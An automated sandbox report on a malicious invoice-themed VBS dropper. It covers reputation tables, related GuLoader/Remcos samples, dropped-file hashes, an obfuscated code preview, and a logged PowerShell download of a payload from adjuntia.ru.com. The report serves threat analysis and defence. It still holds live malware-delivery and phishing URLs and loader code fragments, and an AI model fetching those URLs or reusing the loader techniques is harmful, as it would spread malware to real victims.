https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://adjuntia.ru.com/wp-includes/img/Appliances.smi | 0% | Avira URL Cloud | safe
https://ambyverce.com/Appliances.smi | 0% | Avira URL Cloud | safe
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Avira URL Cloud | safe
https://adjuntia.ru.com | 0% | Avira URL Cloud | safe
http://adjuntia.ru.com | 0% | Avira URL Cloud | safe
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
https://ambyverce.com/Appliances.smid | 0% | Avira URL Cloud | safe
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal
https://github.com/Pester/Pester | 1% | Virustotal
Name | IP | Active | Malicious | Antivirus Detection | Reputation
adjuntia.ru.com | 185.221.216.115 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://adjuntia.ru.com/wp-includes/img/Appliances.smi | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ambyverce.com/Appliances.smi | powershell.exe, 00000003.00000002.3317936149.00000266C0A68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3317936149.00000266BF3C8000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.3408756335.00000266CF20D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3322827054.0000000005E85000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.m | powershell.exe, 00000003.00000002.3438249100.00000266D77E0000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000007.00000002.3317433390.0000000004F78000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000007.00000002.3317433390.0000000004E21000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.microsoft | powershell.exe, 00000007.00000002.3329236621.0000000007A0E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000007.00000002.3317433390.0000000004F78000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://go.micro | powershell.exe, 00000003.00000002.3317936149.00000266C0605000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000007.00000002.3322827054.0000000005E85000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.3408756335.00000266CF20D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3322827054.0000000005E85000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000007.00000002.3322827054.0000000005E85000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000007.00000002.3322827054.0000000005E85000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000003.00000002.3317936149.00000266BF1A1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://adjuntia.ru.com | powershell.exe, 00000003.00000002.3317936149.00000266BF5E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3317936149.00000266C0C44000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000003.00000002.3317936149.00000266BF1A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3317433390.0000000004E21000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://adjuntia.ru.com | powershell.exe, 00000003.00000002.3317936149.00000266C0F9F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000007.00000002.3317433390.0000000004F78000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 1%; Avira URL Cloud: safe | unknown
https://ambyverce.com/Appliances.smid | powershell.exe, 00000007.00000002.3317433390.0000000004F78000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.221.216.115 | adjuntia.ru.com | United Kingdom | 393960 | HOST4GEEKS-LLCUS | false
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1500268
                Start date and time:2024-08-28 06:53:08 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 5m 54s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:10
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:INVOICE_DF76K.vbs
                Detection:MAL
                Classification:mal100.troj.expl.evad.winVBS@11/8@1/1
                EGA Information:Failed
                HCA Information:
                • Successful, ratio: 96%
                • Number of executed functions: 52
                • Number of non-executed functions: 25
                Cookbook Comments:
                • Found application associated with file extension: .vbs
                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                • Excluded IPs from analysis (whitelisted): 93.184.221.240
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target powershell.exe, PID 1600 because it is empty
                • Execution Graph export aborted for target powershell.exe, PID 5572 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                • Report size getting too big, too many NtCreateKey calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
00:53:58 | API Interceptor | 1x Sleep call for process: wscript.exe modified
00:54:10 | API Interceptor | 132x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.221.216.115 | Liste d'inventaire.exe | malicious | FormBook, GuLoader | plyagoogle.sa.com/oLmPN132.bin
185.221.216.115 | Production_list.exe | malicious | GuLoader | thefifthsuncd.sa.com/CgCLdYfbALQqzwZgzwoGcWFCag107.bin
185.221.216.115 | Inventory_list.exe | malicious | GuLoader | simbajonesaberdovey.sa.com/nxieuH252.bin
185.221.216.115 | doc12917820200318081747_pdf_991KB.vbs | malicious | GuLoader, Remcos | gamonosa.sa.com/.well-known/kr/UvcZuvTnzIO46.bin
185.221.216.115 | doc12917820200318081747_pdf_(991KB).vbs | malicious | GuLoader, Remcos | gamonosa.sa.com/.well-known/kr/UvcZuvTnzIO46.bin
185.221.216.115 | Protected Client.vbs | malicious | Remcos | instment.ga/note/Encrypted%20Client%20OG.jpg
185.221.216.115 | ach remit.xls | malicious | Unknown | instment.ga/note/Protected%20Client.vbs
185.221.216.115 | ach remit.xls | malicious | Unknown | instment.ga/note/Encrypted%20Client%20OG.jpg
185.221.216.115 | ach remit.xls | malicious | Unknown | instment.ga/note/Encrypted%20Client%20OG.jpg
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
HOST4GEEKS-LLCUS | http://battlegrounds-bgmi-reward.events-games.com/ | malicious | Unknown | 185.221.219.64
HOST4GEEKS-LLCUS | PO 001.vbs | malicious | GuLoader | 185.221.216.115
HOST4GEEKS-LLCUS | https://dineromillenia.pages.dev | malicious | HTMLPhisher | 185.221.219.64
HOST4GEEKS-LLCUS | RFQ-7H87-F8R-pdf.exe | malicious | Remcos, GuLoader | 185.221.216.247
HOST4GEEKS-LLCUS | https://dineromillenia.pages.dev/ | malicious | HTMLPhisher, Tycoon2FA | 185.221.219.64
HOST4GEEKS-LLCUS | https://click.pstmrk.it/3s/link.sbstck.com%2Fredirect%2Ffdc039b6-14b1-43e9-8235-12dc248cdb78%3Fj%3DeyJ1IjoiNDltdXZ6In0.CxolcWPhPGrBgw3rA0jd5lscc71sjQLfIOZNSPA48EY%3D/YI-Q/fDO3AQ/AQ/17a69137-bb89-4a93-9d8b-1ad30fe8f190/1/pUhVRIX1zr | malicious | HTMLPhisher | 185.221.216.115
HOST4GEEKS-LLCUS | DHL Package.exe | malicious | GuLoader, Snake Keylogger | 172.93.120.113
HOST4GEEKS-LLCUS | Setup.exe | malicious | AsyncRAT, HTMLPhisher, Clipboard Hijacker, Phorpiex, PureLog Stealer, Raccoon Stealer v2, RedLine | 172.93.120.134
HOST4GEEKS-LLCUS | ZYRWFLfnV1.exe | malicious | GuLoader | 172.93.120.134
HOST4GEEKS-LLCUS | PinnacesMax.exe | malicious | FormBook, GuLoader | 172.93.120.134
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Quotation.exe | malicious | AgentTesla | 185.221.216.115
3b5074b1b5d032e5620f69f9f700ff0e | ibero.bat | malicious | SilverRat | 185.221.216.115
3b5074b1b5d032e5620f69f9f700ff0e | Invoice0.exe | malicious | SilverRat | 185.221.216.115
3b5074b1b5d032e5620f69f9f700ff0e | ZKB - Zahlungsbest#U00e4tigung an 20240828.pdf.exe | malicious | Quasar | 185.221.216.115
3b5074b1b5d032e5620f69f9f700ff0e | IrisLily673Xander.msc.exe | malicious | Unknown | 185.221.216.115
3b5074b1b5d032e5620f69f9f700ff0e | http://pub-10050726d25949d8bd6cb438a8b6b09c.r2.dev/home.html | malicious | Unknown | 185.221.216.115
3b5074b1b5d032e5620f69f9f700ff0e | http://get-verified-free-badge.vercel.app/ | malicious | Unknown | 185.221.216.115
3b5074b1b5d032e5620f69f9f700ff0e | https://office.microsoftoniline.com/common/oauth2/v2.0/authorize/?clinet_id=2e5d6a57-eb8c-44bf3-8bd3-fc61824af882 | malicious | Unknown | 185.221.216.115
3b5074b1b5d032e5620f69f9f700ff0e | http://pub-85c8ac492a5e41d7b0fad25337aa69f6.r2.dev/index.html | malicious | Unknown | 185.221.216.115
3b5074b1b5d032e5620f69f9f700ff0e | https://appeal-right.netlify.app/ | malicious | Unknown | 185.221.216.115
No context
                Process:C:\Windows\System32\wscript.exe
                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                Category:dropped
                Size (bytes):71954
                Entropy (8bit):7.996617769952133
                Encrypted:true
                SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                Malicious:false
                Reputation:high, very likely benign file
                Process:C:\Windows\System32\wscript.exe
                File Type:data
                Category:dropped
                Size (bytes):328
                Entropy (8bit):3.144086598890895
                Encrypted:false
                SSDEEP:6:kK3R9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:fADnLNkPlE99SNxAhUe/3
                MD5:E697A7B528579C663428404F3AD83FE4
                SHA1:882F9BB4B1EDA55E6BB6DD2517261808E9829CBA
                SHA-256:CAD12ED92A0185F56EC0F2407EC4E4E7375B7DB29DABBB8C170E1FB992951E73
                SHA-512:A380250C7FA892B93C0C1127DDEAAF9A36906EED2148DB888F52198ED3692D6321F373B9C8229442D6DEFEAB311E84B99348A48B1E1A270BC46FCCD1DAB1A96C
                Malicious:false
                Reputation:low
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:modified
                Size (bytes):11608
                Entropy (8bit):4.8908305915084105
                Encrypted:false
                SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with very long lines (65536), with no line terminators
                Category:dropped
                Size (bytes):464620
                Entropy (8bit):5.975508506784015
                Encrypted:false
                SSDEEP:12288:YsOXOjSaM9ILRXA3uF4/ooebQHGBrYhHqXlqxG4/8:YxXtb9ILRXp4V3mdYhAl+s
                MD5:62E0420B9A9C55E3EB4584150A0ECD9B
                SHA1:662813124A4BA0AFAA06BE627AC8034E9E8C3F2D
                SHA-256:EE5C24B25D6BE0B41524F72D3B772E628DE8763BEEB931A980F4A2AE4C0CE1DF
                SHA-512:8C752C111AF4B7355E9503BB7E9B7DEB6ADB9CF360B2F34421EBC4DF7A62BA54BBE04C4F880C11767095181CAAA81D277AA0C8DAC54E19B7C6FAAC74EB3204CF
                Malicious:false
                File type:ASCII text, with CRLF line terminators
                Entropy (8bit):5.042968723535752
                TrID:
                  File name:INVOICE_DF76K.vbs
                  File size:51'026 bytes
                  MD5:af84a827601b117c89f0fe2a30604669
                  SHA1:6844a66c86b23a67429aee33094ba33bc9c61fe6
                  SHA256:48c37299c9515e8cf91ff1faa09135014ae7303a88aea29e1d2298398200617f
                  SHA512:08ed82ae956a5e05e54da7699471808b18bc3c741bf401e12421a0be51a72a38fc250f2c47732159dd7ddd8c770203707ee74fc65fe8ad173d6da77853a38c70
                  SSDEEP:384:3TZMJWa0ExTcydcXtfKUg9EHfHAWcaaySJTFpuIDoGWKj0vfyFkMAqfhCDnXSP3D:Daj0ExAVg9KTwRubhwkAL
                  TLSH:00337CC27ACD1B13218CFDFEE646CDA958F34C652A0D95B5365CACE700322BC751A1B9
                  File Content Preview:..Anisbolchers = "Royalized"....centers &H80000002, "S" + "OFTWARE\Classes\VBS" + "File"..........Dim Bulnedes..Bulnedes = DateAdd("s", 10, Now())..Do Until (Now() > Bulnedes)..Loop..Undertal= array(79+1,79,87,69,82,83,72,69,76,76)..Private Const Cenatory
                  Icon Hash:68d69b8f86ab9a86
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Aug 28, 2024 06:54:14.090058088 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.090420961 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.090491056 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.130224943 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.130307913 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.130356073 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.130407095 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.130793095 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.130856037 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.131009102 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.131064892 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.131393909 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.131448030 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.131628990 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.131685972 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.132114887 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.132178068 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.132431984 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.132464886 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.132486105 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.132503033 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.132539988 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.132563114 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.133163929 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.133229971 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.133311987 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.133372068 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.167637110 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.167715073 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.167920113 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.167977095 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.176597118 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.176661968 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.176863909 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.176913977 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.176970005 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.177028894 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.217004061 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.217139959 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.217223883 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.217281103 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.217550039 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.217605114 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.217812061 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.217869043 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.218106031 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.218158007 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.218391895 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.218435049 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.218530893 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.218589067 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.218765020 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.218831062 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.218991041 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.219065905 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.221885920 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.222039938 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.222096920 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.222110033 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.222135067 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.222143888 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.222269058 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.222331047 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.254756927 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.254853010 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.254861116 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.254874945 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.254918098 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.254919052 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.254926920 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.254956007 CEST44349705185.221.216.115192.168.2.5
                  Aug 28, 2024 06:54:14.254990101 CEST49705443192.168.2.5185.221.216.115
                  Aug 28, 2024 06:54:14.257807016 CEST49705443192.168.2.5185.221.216.115
                  UDP packets
                  Timestamp                             Source Port  Dest Port  Source IP    Dest IP
                  Aug 28, 2024 06:54:12.256294012 CEST  61792        53         192.168.2.5  1.1.1.1
                  Aug 28, 2024 06:54:12.268279076 CEST  53           61792      1.1.1.1      192.168.2.5

                  DNS queries
                  Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name             Type            Class        DNS over HTTPS
                  Aug 28, 2024 06:54:12.256294012 CEST  192.168.2.5  1.1.1.1  0xbd5f    Standard query (0)  adjuntia.ru.com  A (IP address)  IN (0x0001)  false

                  DNS answers
                  Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name             CName  Address          Type            Class        DNS over HTTPS
                  Aug 28, 2024 06:54:12.268279076 CEST  1.1.1.1    192.168.2.5  0xbd5f    No error (0)  adjuntia.ru.com         185.221.216.115  A (IP address)  IN (0x0001)  false
                  • adjuntia.ru.com
                  HTTP sessions
                  Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                  0           192.168.2.5  49705        185.221.216.115  443               1600  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                  Timestamp                Bytes transferred  Direction  Data
                  2024-08-28 04:54:13 UTC  189                OUT        GET /wp-includes/img/Appliances.smi HTTP/1.1
                                                                         User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                         Host: adjuntia.ru.com
                                                                         Connection: Keep-Alive
                  2024-08-28 04:54:13 UTC  219                IN         HTTP/1.1 200 OK
                                                                         Date: Wed, 28 Aug 2024 04:54:13 GMT
                                                                         Server: Apache
                                                                         Last-Modified: Tue, 27 Aug 2024 23:40:52 GMT
                                                                         Accept-Ranges: bytes
                                                                         Content-Length: 464620
                                                                         Connection: close
                                                                         Content-Type: application/smil+xml

                  Target ID:0
                  Start time:00:53:57
                  Start date:28/08/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE_DF76K.vbs"
                  Imagebase:0x7ff623690000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:2
                  Start time:00:53:59
                  Start date:28/08/2024
                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Imagebase:0x7ff6ef0c0000
                  File size:496'640 bytes
                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                  Has elevated privileges:true
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:3
                  Start time:00:54:09
                  Start date:28/08/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
